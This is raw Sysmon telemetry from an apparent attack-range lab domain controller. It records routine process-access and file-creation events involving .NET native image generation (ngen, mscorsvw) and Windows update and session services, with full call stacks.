13:46:55.500{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5802-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.485{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5802-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.485{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5802-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:55.422{59A5CD1D-914F-6005-5702-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\106c-0\System.ComponentModel.DataAnnotations.dll2021-01-18 13:46:55.422 10341000x80000000000000006537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.219{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5702-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.219{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5702-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:55.219{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5702-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5602-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.141{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5602-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.141{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5602-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:55.094{59A5CD1D-914E-6005-5502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12ac-0\System.ComponentModel.Composition.Registration.dll2021-01-18 13:46:55.094 10341000x80000000000000006551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:56.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9150-6005-5B02-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:56.172{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9150-6005-5B02-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:56.172{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9150-6005-5B02-00000000A301}2632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:00.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.922{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+210d2|c:\windows\system32\usocore.dll+15924|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|
C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.594{59A5CD1D-9154-6005-5D02-00000000A301}4300860C:\Windows\system32\conhost.exe{59A5CD1D-9154-6005-5C02-00000000A301}4676C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:00.563{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9154-6005-5D02-00000000A301}4300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 